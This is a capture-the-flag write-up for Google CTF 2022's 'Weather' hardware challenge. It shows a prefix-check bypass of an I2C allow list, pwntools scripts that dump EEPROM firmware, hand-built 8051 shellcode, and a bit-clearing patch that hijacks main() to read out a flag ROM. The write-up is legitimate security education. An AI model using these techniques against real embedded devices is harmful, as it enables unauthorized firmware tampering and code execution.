# Weather
Weather was a hardware challenge from [Google CTF 2022](https://capturetheflag.withgoogle.com/) built around a weather station running on a microcontroller with attached sensors and a serial interface. The goal was to extract a flag from an internal ROM device.

For the challenge we were given a datasheet describing the microcontroller, its attached devices and the available interfaces. We were also given the firmware source code, written in C.

## Reading the datasheet
From the datasheet we can determine the following information:

The microcontroller has three interfaces available: I2C for attached sensors, SPI for XRAM (external RAM) and UART for user communication with the weather station.

The XRAM attached through SPI is a CTF-55930D, a 32K EEPROM storing the running program, which also has an additional I2C interface (!).
Writing to the EEPROM does not store the bits we send; instead, we tell the EEPROM which bits to **clear**.

The microcontroller also has an internally attached ROM containing the flag, which can be accessed through special registers in the memory space.

We have the following sensors attached through I2C:
- Humidity Sensor at address 119
- Light Sensors at 110 and 111
- Pressure Sensor at 108
- Temperature Sensor at 101

We can also get some clues on other parts of the setup:

The microcontroller is called CTF-8051, which together with the Special Function Registers hints at the controller being some form of an 8051 processor.

## Analyzing the firmware source
From the firmware sources we can determine how to interface with the weather station.

Knowing the goal, the first thing to look for is any reference to the flag ROM we want to read from. Outside of the definitions of the `FLAGROM_ADDR` and `FLAGROM_DATA` registers, however, it is not used anywhere in the program, so we will need to find another way in.

The communication is performed via UART (accessible through a network socket in our case). After a prompt we can perform two actions:
- A read, with `r <addr> <size>` which will read `size` bytes from the device at address `addr`
- A write, with `w <addr> <size> <byte1> <byte2> .. <byteN>` which will write `size` bytes to the device at address `addr`

The address provided in the command is checked against a list of predefined addresses:
```c
const char *ALLOWED_I2C[] = {
  "101",  // Thermometers (4x).
  "108",  // Atmospheric pressure sensor.
  "110",  // Light sensor A.
  "111",  // Light sensor B.
  "119",  // Humidity sensor.
  NULL
};

// [...]

bool is_port_allowed(const char *port) {
  for(const char **allowed = ALLOWED_I2C; *allowed; allowed++) {
    const char *pa = *allowed;
    const char *pb = port;
    bool allowed = true;
    while (*pa && *pb) {
      if (*pa++ != *pb++) {
        allowed = false;
        break;
      }
    }
    if (allowed && *pa == '\0') return true;
  }
  return false;
}

uint8_t str_to_uint8(const char *s) {
  uint8_t v = 0;
  while (*s) {
    uint8_t digit = *s++ - '0';
    if (digit >= 10) return 0;
    v = v * 10 + digit;
  }
  return v;
}

int8_t port_to_int8(char *port) {
  if (!is_port_allowed(port)) return -1;

  return (int8_t) str_to_uint8(port);
}
```

The code checking whether our address is allowed is flawed, though: it only compares the first 3 bytes of our input, as all the predefined addresses are 3 bytes long.
Knowing that, if we send an address like `10100000000`, it is accepted as valid, and the eight trailing zeros make the `uint8_t` variable `v` in the `str_to_uint8` conversion function wrap around to 0 (every digit multiplies `v` by 10, and 101 × 10^8 is a multiple of 256). We can then append any arbitrary address after it.
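
To make the wrap-around concrete, here is a small offline model of the two firmware functions in Python. It is only a sketch: the `& 0xFF` masking stands in for the C `uint8_t` truncation, and the prefix test is our reading of the loop in `is_port_allowed`.

```python
ALLOWED_I2C = ["101", "108", "110", "111", "119"]

def is_port_allowed(port: str) -> bool:
    # The firmware loop stops once an allowed entry is fully matched,
    # so it behaves like a prefix check.
    return any(port.startswith(allowed) for allowed in ALLOWED_I2C)

def str_to_uint8(s: str) -> int:
    v = 0
    for ch in s:
        digit = (ord(ch) - ord("0")) & 0xFF   # uint8_t arithmetic
        if digit >= 10:
            return 0
        v = (v * 10 + digit) & 0xFF           # truncation to 8 bits
    return v

def port_to_int8(port: str) -> int:
    if not is_port_allowed(port):
        return -1
    v = str_to_uint8(port)
    return v - 256 if v >= 128 else v         # cast to int8_t

print(str_to_uint8("10100000000"))    # value after the zero prefix
print(port_to_int8("1010000000033"))  # accepted, resolves to a different port
print(port_to_int8("33"))             # rejected by the allow list
```

The first call shows that the prefix alone leaves `v` at zero, so whatever digits follow decide the final port number.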

## Finding the EEPROM
With the ability to communicate with arbitrary devices, we can scan all 128 possible addresses for devices with code like the following:
```python
from pwn import *

p = remote('weather.2022.ctfcompetition.com', 1337)

def read_from_address(address, size):
    # Wait for the prompt, then issue a read command
    p.recvuntil(b'? ')
    p.sendline(f'r {address} {size}'.encode())
    p.recvuntil(b'i2c status: ')
    status = p.recvline().strip()
    # The data bytes come back as decimal numbers, terminated by "-end"
    ret_data = p.recvuntil(b'\n-end\n', drop=True).decode().strip().split()
    return status, bytes([int(a) for a in ret_data])

# Probe every 7-bit I2C address through the prefix bypass
for i in range(128):
    status, data = read_from_address(f'10100000000{i}', 128)
    if status != b'error - device not found':
        print(f'Device exists on address {i}')
```

With it we can discover a new unknown device at address 33. Based on the diagrams from the datasheet, it is very likely the EEPROM containing the running program.

To verify that theory we can try reading the data pages from it following the instructions from the datasheet:
> Reading data from a 64-byte page is done in two steps:
> 1. Select the page by writing the page index to EEPROM's I2C address.
> 2. Receive up to 64 bytes by reading from the EEPROM's I2C address.

To do that we can use code like the one below:
```python
# See the code above to find the other functions used

def write_to_address(address, data):
    size = len(data)
    p.recvuntil(b'? ')
    p.sendline(f'w {address} {size} {" ".join([str(a) for a in data])}'.encode())
    p.recvuntil(b'i2c status: ')
    return p.recvline().strip()

# Select page 0, then read its 64 bytes
write_to_address('1010000000033', [0])
status, data = read_from_address('1010000000033', 64)
print(data.hex())
```

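With some data returned, we can try dumping all 64 pages and saving them to `eeprom.raw`.
```python
with open('eeprom.raw', 'wb') as f:  # keep the dump for offline analysis
    for i in range(64):
        write_to_address('1010000000033', [i])
        status, data = read_from_address('1010000000033', 64)
        print(data.hex())
        f.write(data)
```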

Now that we have the memory dumped, we can see what is inside it.
```
» strings eeprom.raw
// [...]
"i2c status: transaction completed / ready
i2c status: busy
i2c status: error - device not found
i2c status: error - device misbehaved
i2c status: unknown error
Weather Station
-err: command too long, rejected
-err: command format incorrect
-err: unknown command
-err: port invalid or not allowed
-err: I2C request length incorrect
-end
```

This means that we did indeed dump the program memory.

## Taking control of the device
### Creating the shellcode
With access to the program memory of the device, we now have a way to extract the flag from the internal ROM.

To produce shellcode we can use [sdcc](http://sdcc.sourceforge.net/). It generates a listing file (`.lst`) for the compiled program, containing the instruction bytes, source code lines and other relevant information.

The exploit code has to read the flag ROM byte by byte and write the data into the `SERIAL_OUT_DATA` register for us to read it.

Sample exploit code:
```c
#include <stdint.h>
__sfr __at(0xee) FLAGROM_ADDR;
__sfr __at(0xef) FLAGROM_DATA;
__sfr __at(0xf2) SERIAL_OUT_DATA;
__sfr __at(0xf3) SERIAL_OUT_READY;

int main(void) {
  uint8_t a = 0;
  while (a < 255) {
    FLAGROM_ADDR = a;
    while (!SERIAL_OUT_READY) {};
    SERIAL_OUT_DATA = FLAGROM_DATA;
    a++;
  }
  return 0;
}
```

Then after compiling our exploit code with `sdcc exploit.c`, we can view `exploit.lst` to read out the instruction bytes for our exploit.
```
140 ; exploit.c:9: while (a < 255) {
000000 7F 00 [12] 141 mov r7,#0x00
000002 142 00104$:
000002 BF FF 00 [24] 143 cjne r7,#0xff,00126$
000005 144 00126$:
000005 50 0C [24] 145 jnc 00106$
146 ; exploit.c:10: FLAGROM_ADDR = a;
000007 8F EE [24] 147 mov _FLAGROM_ADDR,r7
148 ; exploit.c:11: while (!SERIAL_OUT_READY) {};
000009 149 00101$:
000009 E5 F3 [12] 150 mov a,_SERIAL_OUT_READY
00000B 60 FC [24] 151 jz 00101$
152 ; exploit.c:12: SERIAL_OUT_DATA = FLAGROM_DATA;
00000D 85 EF F2 [24] 153 mov _SERIAL_OUT_DATA,_FLAGROM_DATA
154 ; exploit.c:13: a++;
000010 0F [12] 155 inc r7
000011 80 EF [24] 156 sjmp 00104$
000013 157 00106$:
158 ; exploit.c:15: return 0;
000013 90 00 00 [24] 159 mov dptr,#0x0000
160 ; exploit.c:16: }
000016 22 [24] 161 ret
```
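
Copying the bytes out of the listing by hand is error-prone, so a small script can help. The sketch below is a hypothetical helper, not part of the original solution: it assumes listing lines of the form `address bytes [cycles] ...` as shown above, and it does not handle relocatable entries such as `90r00rA5`, which the line pattern simply does not match.

```python
import re

# Sample lines copied from the listing above (whitespace collapsed).
LISTING = """\
140 ; exploit.c:9: while (a < 255) {
000000 7F 00 [12] 141 mov r7,#0x00
000002 142 00104$:
000002 BF FF 00 [24] 143 cjne r7,#0xff,00126$
000005 50 0C [24] 145 jnc 00106$
000007 8F EE [24] 147 mov _FLAGROM_ADDR,r7
000009 E5 F3 [12] 150 mov a,_SERIAL_OUT_READY
00000B 60 FC [24] 151 jz 00101$
00000D 85 EF F2 [24] 153 mov _SERIAL_OUT_DATA,_FLAGROM_DATA
000010 0F [12] 155 inc r7
000011 80 EF [24] 156 sjmp 00104$
000013 90 00 00 [24] 159 mov dptr,#0x0000
000016 22 [24] 161 ret
"""

# address, one or more hex byte pairs, then the "[cycles]" column
LINE_RE = re.compile(r"^\s*[0-9A-F]{6}\s+((?:[0-9A-F]{2}\s+)+)\[\s*\d+\]")

def listing_to_bytes(text: str) -> bytes:
    out = bytearray()
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:  # comment and label lines carry no bytes and are skipped
            out += bytes.fromhex("".join(m.group(1).split()))
    return bytes(out)

shellcode = listing_to_bytes(LISTING)
print(shellcode.hex(" "))
```

Since all jumps in this listing are relative (`jnc`, `jz`, `sjmp`), the resulting bytes do not depend on where in memory they end up.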

### Writing our shellcode into memory
Near the end of program memory we can see 24 pages filled with `FF` bytes, which is a perfect place for shellcode that sequentially reads bytes out of the flag ROM and sends them to the UART interface.

It is the perfect place because, as mentioned previously, writing to the EEPROM can only clear bits: there is no way to set a bit back to 1 once it has been cleared. Since every bit in these pages is still 1, we can write exactly the bytes we want without any further constraints.

To write our data into one of these `FF`-filled pages, we can again turn to the datasheet:
> Programming the EEPROM is done by writing the following packet to the EEPROM's I2C address:
> `<PageIndex> <4ByteWriteKey> <ClearMask> ... <ClearMask>`
> The PageIndex selects a 64-byte page to operate on. The WriteKey is a 4 byte unlock key meant to prevent accidental overwrites.
> Its value is constant: `A5 5A A5 5A`. Each ClearMask byte is applied to the consecutive bytes of the page, starting from byte at index 0.
> All bits set to 1 in the ClearMask are cleared (set to 0) for the given byte in the given page on the EEPROM:
> `byte[i] ← byte[i] AND (NOT clear_mask_byte)`

With that known, we can write a helper function to write given data into the EEPROM:
```python
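def write_eeprom_page(page, data):
    # Pad to a full page; the 0x00 padding turns into 0xFF masks below
    if len(data) != 64:
        data += b'\x00' * (64 - len(data))
    # The EEPROM expects clear masks, so send the bitwise inverse of the data
    data = bytes([((~a) & 0xff) for a in data])
    write_to_address('1010000000033', bytes([page, 0xa5, 0x5a, 0xa5, 0x5a]) + data)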
```
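
The clear-mask rule quoted from the datasheet can also be modelled offline, which is handy for checking a write before sending it. This is only a sketch; the function names are ours and nothing here talks to the device.

```python
def masks_for(desired: bytes) -> bytes:
    # A mask bit of 1 clears the bit, so the mask is the inverse of the data.
    return bytes((~b) & 0xFF for b in desired)

def apply_clear_masks(page: bytes, masks: bytes) -> bytes:
    # byte[i] <- byte[i] AND (NOT clear_mask_byte); bytes past the masks are untouched.
    out = bytearray(page)
    for i, m in enumerate(masks):
        out[i] &= ~m & 0xFF
    return bytes(out)

def can_program(current: bytes, desired: bytes) -> bool:
    # Only 1 -> 0 transitions are possible: every 1 bit we want must still be set.
    return all((c & d) == d for c, d in zip(current, desired))

erased = b"\xff" * 4
wanted = b"\x02\x0a\x00\x22"
print(apply_clear_masks(erased, masks_for(wanted)).hex())
print(can_program(b"\x39", b"\x7f"))  # 0x39 lacks bits that 0x7f needs
```

Note that a data byte of `0x00` corresponds to a mask of `0xFF`, so the zero padding in `write_eeprom_page` clears every remaining byte of the page to `0x00`, which is a NOP on the 8051.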

And to test it, we can write our shellcode into the first page which contains the FF bytes:
```python
shellcode = bytes.fromhex('7F 00 BF FF 00 50 0C 8F EE E5 F3 60 FC 85 EF F2 0F 80 EF 90 00 00 22')

# Read the existing data
write_to_address(f'1010000000033', [40])
status, data = read_from_address(f'1010000000033', 64)
print(data.hex())
# 3900ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

# Write our shellcode with some nop bytes
write_eeprom_page(40, b'\x00' * 16 + shellcode)

# Verify if it was written
write_to_address(f'1010000000033', [40])
status, data = read_from_address(f'1010000000033', 64)
print(data.hex())
# 000000000000000000000000000000007f00bfff00500c8feee5f360fc85eff20f80ef9000002200000000000000000000000000000000000000000000000000
```

### Finding a way to run our shellcode
The other problem is getting the shellcode to execute. With the shellcode placed at address 0xa00 (page 40), an `LJMP 0xa00` instruction would take us there; according to the [8051 instruction reference](https://www.win.tue.nl/~aeb/comp/8051/set8051.html#51ljmp) it is encoded as `02 0a 00`.

Knowing that, we can try to find a place in `main()` where clearing some bits turns the existing instruction bytes into our jump.

First, we can try to correlate the data we dumped from the memory with a compiled version of the firmware. To do that, we can compile `firmware.c` with sdcc and use the resulting listing again.
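
The page and address arithmetic used here is simple enough to script. The helpers below are hypothetical names for illustration, assuming the 64-byte pages described in the datasheet and the `LJMP` encoding of opcode `02` followed by the 16-bit target, high byte first.

```python
PAGE_SIZE = 64  # bytes per EEPROM page

def page_to_address(page: int) -> int:
    return page * PAGE_SIZE

def address_to_page(addr: int) -> tuple[int, int]:
    # Returns (page index, byte offset inside that page).
    return divmod(addr, PAGE_SIZE)

def ljmp(addr: int) -> bytes:
    if not 0 <= addr <= 0xFFFF:
        raise ValueError("LJMP takes a 16-bit address")
    return bytes([0x02]) + addr.to_bytes(2, "big")

print(hex(page_to_address(40)))
print(ljmp(page_to_address(40)).hex(" "))
print(address_to_page(0x44B))
```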

In the listing we can find that the main loop starts around the address 1099 (0x44B):
```
1032 ;------------------------------------------------------------
1033 ; firmware.c:200: int main(void) {
1034 ; -----------------------------------------
1035 ; function main
1036 ; -----------------------------------------
000442 1037 _main:
1038 ; firmware.c:201: serial_print("Weather Station\n");
000442 90r00rA5 [24] 1039 mov dptr,#___str_5
000445 75 F0 80 [24] 1040 mov b,#0x80
000448 12r00r8D [24] 1041 lcall _serial_print
1042 ; firmware.c:206: while (true) {
00044B 1043 00135$:
1044 ; firmware.c:207: serial_print("? ");
00044B 90r00rB6 [24] 1045 mov dptr,#___str_6
00044E 75 F0 80 [24] 1046 mov b,#0x80
000451 12r00r8D [24] 1047 lcall _serial_print

```

Then we can loop over the program bytes trying to find a place which we can use for the jump:
```python
program = open('eeprom.raw', 'rb').read()  # Previously extracted program memory

def and_bytes(a, b):
    return bytes([aa & bb for aa, bb in zip(a, b)])

# A site is usable if every 1 bit of the target is still set there
target = b'\x02\x0a\x00'
for offset in range(0x44B, 0x6B9):
    if and_bytes(target, program[offset:offset+3]) == target:
        print(f'Jump possible at {hex(offset)}')
```

And with the position of a viable jump known, we can then overwrite the instructions with our helper write function:
```python
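# offset must be set to one of the addresses reported by the search above
page_number = offset // 64
instr_offset = offset % 64
# The 0x00 filler clears the rest of this page to 0x00 (NOP) when written
jump_data = b'\x00' * instr_offset + target
jump_data += b'\x00' * (64 - len(jump_data))

write_eeprom_page(page_number, jump_data)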
```
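
One detail worth guarding against: the write helper operates on a single page, so a candidate whose three bytes straddle a page boundary cannot be written in one go. The sketch below is our own variant of the search that filters those out; `find_jump_sites` is a hypothetical name, and the demo data is synthetic rather than taken from the real dump.

```python
PAGE_SIZE = 64

def find_jump_sites(program: bytes, target: bytes, start: int, end: int) -> list[int]:
    sites = []
    for offset in range(start, end):
        window = program[offset:offset + len(target)]
        if len(window) < len(target):
            break  # ran off the end of the dump
        # Every 1 bit of the target must still be set in the existing bytes.
        fits = all((w & t) == t for w, t in zip(window, target))
        # All bytes of the instruction must live in the same page.
        same_page = offset // PAGE_SIZE == (offset + len(target) - 1) // PAGE_SIZE
        if fits and same_page:
            sites.append(offset)
    return sites

# Synthetic demo: one usable site and one that crosses a page boundary.
demo = bytearray(256)
demo[10:13] = b"\x12\x0b\x80"
demo[62:65] = b"\xff\xff\xff"
print(find_jump_sites(bytes(demo), b"\x02\x0a\x00", 0, len(demo)))
```

With the real dump, the same call would be made with `program`, `target` and the `0x44B` to `0x6B9` range used above.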

Then, with our jump written, we need to send any command so that the program reaches our jump:
```python
p.sendline(b'r 1 1')
p.interactive()
```

And with that, we get a dump of the flag ROM:
```
[*] Switching to interactive mode
? CTF{DoesAnyoneEvenReadFlagsAnymore?}
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00err: port invalid or not allowed
```
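
If the output is captured with something like `p.recvall()` instead of interactive mode, the flag can be picked out of the surrounding null bytes with a short pattern match. This is a minimal sketch with a hypothetical helper name, assuming the usual `CTF{...}` flag format seen above.

```python
import re

def extract_flag(raw: bytes):
    # Look for the first CTF{...} token in the raw serial output.
    m = re.search(rb"CTF\{[^}]*\}", raw)
    return m.group(0).decode() if m else None

sample = b"? CTF{DoesAnyoneEvenReadFlagsAnymore?}\n" + b"\x00" * 16
print(extract_flag(sample))
```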

Original writeup (https://gist.github.com/szymex73/29f470c7d053ab8a80de6a78c896a727).